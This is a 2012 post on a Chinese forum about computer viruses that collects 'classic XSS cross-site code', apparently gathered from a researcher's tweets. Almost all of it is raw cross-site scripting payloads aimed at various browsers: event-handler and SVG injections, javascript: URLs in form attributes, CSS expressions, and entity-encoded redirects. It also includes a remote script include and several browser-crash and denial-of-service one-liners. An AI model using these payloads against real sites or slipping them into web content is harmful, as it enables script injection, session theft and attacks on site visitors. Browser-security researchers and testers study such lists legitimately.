首页 › 电脑病毒论坛 › 一些经典的XSS跨站代码整理

彬能哥 發表於 2012-7-6 17:02:45

一些经典的XSS跨站代码整理

&lt;!-- &quot; --!&gt;&lt;input value=&quot;&gt;&lt;img src=xx:x onerror=alert(1)//&quot;&gt; <br />&lt;script/onload=alert(1)&gt;&lt;/script&gt; IE9 <br />&lt;style/onload=alert(1)&gt; <br />alert(--&gt;1&lt;!--) <br />1&lt;!--i <br />document.write('&lt;img src=&quot;&lt;iframe/onload=alert(1)&gt;\0&quot;&gt;'); IE8 <br />JSON.parse('{&quot;__proto__&quot;:[&quot;a&quot;,1]}') <br />location++ <br />IE valid syntax: 我，啊=1,b=[我，啊],alert(我，啊) <br />alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog <br />&lt;svg&gt;&lt;animation xLI:href=&quot;javascript:alert(1)&quot;&gt; based on H5SC#88 #Opera <br />Function('alert(arguments.callee.caller)')() <br />firefox dos? while(1)find(); <br />&lt;div/style=x:expression(alert(URL=1))&gt; <br />Inject &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=EmulateIE7&quot;&gt; enabled css expression,breaking standard mode! <br />&lt;applet code=javascript:alert('sgl')&gt; and &lt;embed src=javascript:alert('sgl')&gt; umm...cute FF! <br />&lt;math&gt;&lt;script&gt;sgl='&lt;img/src=xx:x onerror=alert(1)&gt;'&lt;/script&gt; chrome firefox opera vector <br />&lt;svg&gt;&lt;oooooo/oooooooooo/onload=alert(1) &gt; works on webkit~ <br />&lt;body/onload=\\\vbs\\\::::::::alert+'x'++'o'+'x'+::::::::&gt; <br />vbs:alert+-[] <br />&lt;body/onload=vbs::::::::alert----+--+----1:::::::::&gt; <br />Firefox vector &lt;math&gt;&lt;a xlink:href=&quot;//mmme.me&quot;&gt;click <br />&lt;svg&gt;&lt;script&gt;a='&lt;svg/onload=alert(1)&gt;&lt;/svg&gt;';alert(2)&lt;/script&gt; <br />Inj&gt;&gt; &lt;script/src=//0.gg/xxxxx&gt; &lt;&lt; &lt;script&gt;...&lt;/script&gt; less xss <br />Webkit X-XSS-Protection header is enabled just now :P <br />&lt;svg/onload=domain=id&gt; 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/ <br />&lt;?xml encoding=&quot;&gt;&lt;svg/onload=alert(1)// &gt;&quot;&gt; <br />&lt;a &quot;&lt;img/src=xxx:x onerror=alert(1) &gt;x&lt;/a&gt; Distinctive IE <br />Also &lt;a `=&quot;&lt;img/onerror=alert(1) src=xx:xx&gt;'&gt;&lt;/h1&gt;&quot;&gt;x&lt;/a&gt; <br />&lt;h1 &quot;='&lt;img/onerror=alert(1) src=xx:xx&gt;'&gt;&lt;/h1&gt; IE only <br />&lt;1h name=&quot;&lt;svg/onload=alert(1)&gt;&quot;&gt;&lt;/1h&gt; <br />&lt;img =&quot;1 src=xxx:x onerror=alert(1)//&quot; &gt; works in not-IE <br />javascript=1;for(javascript in RuntimeObject());javascript=='javascript' <br />&lt;body/onerror=alert(event)&gt;&lt;img/src=javascript:throw&gt; Firefox Sanbox object <br />&lt;img src='javascript:while([{}]);'&gt; works in firefox <br />for(x in document.open); Crash your IE 6:&gt; <br />localStorage.setItem('setItem',1) <br />Only to find '?'.toUpperCase()==='?'.toUpperCase() <br />J? H? T? W? Y? i? length==2 <br />'?'.toUpperCase()=='I' <br />Also '?'.toUpperCase()=='SS' <br />'?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST <br />#Opera data:text/html;base64,&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; <br />Firefox always the most cute data:_,&lt;script&gt;alert(1)&lt;/script&gt; <br />&lt;a href=&quot;ftp:/baidu.com&quot;&gt;xx&lt;/a&gt; <br />http://?????????? works in Firefox <br />RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else? <br />location='&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#49&amp;#41' <br />for({} in {}); <br />興味深いhttp://jsbin.com/inekab for Opera only <br />&lt;a href=https:http://www.google.com&gt;x&lt;/a&gt; That's a relative path? <br />document.frames==window.frames <br />&lt;a href=&quot;jar:xxx&quot; id=x&gt;&lt;/a&gt; x.protocol=='http:' on #firefox <br />(0).constructor.constructor=function(){alert(eval(arguments.substr(6)))} Easy to decode jjencode and aaencode :D <br />127.0x000000001==127.0.0.1 <br />&lt;input value=&quot;&amp;#31sefewfewf&quot;/&gt; Chrome input value block <br />&lt;svg&gt;&lt;xmp&gt;&lt;img/onerror=alert(1) src=xxx:x /&gt; <br />&lt;img src/=&quot;&gt;&lt;img src=xxx:x onerror=alert(1)//&quot;&gt; <br />有趣的isindex &lt;isindex formaction=javascript:alert(1) type=submit &gt; <br />chrome:xx - &gt;chrome://crash/ crash? <br />&lt;form action=javascript:alert(1) /&gt;&lt;input&gt; Chrome input enter fucked! <br />&lt;form/&gt;&lt;button/&gt;&lt;keygen/&gt; chrome send empty key,is funny~_~ <br />&lt;form/&gt;&lt;input/formaction=javascript:alert(1)&gt; Because &lt;form&gt; not a void element.&lt;form&gt;&lt;input/name=&quot;isindex&quot;&gt; when name are isindex does not send key. <br />&lt;form id=x &gt;&lt;/form&gt;&lt;button form=x formaction=&quot;javascript:alert(1)&quot;&gt;X It like http://html5sec.org/#1 but only chrome support . <br />&lt;script language=&quot;php&quot;&gt;echo 1 ?&gt; Fascinating. <br />fvck:for(_?in?this)_['match'](/.Element$/)&amp;&amp;console.log(_) <br />location.reload('javascript:alert(1)') //ie only,lol~ <br />{}alert(1) <br />Twitter @jackmasa =P <br />

查看完整版本: 一些经典的XSS跨站代码整理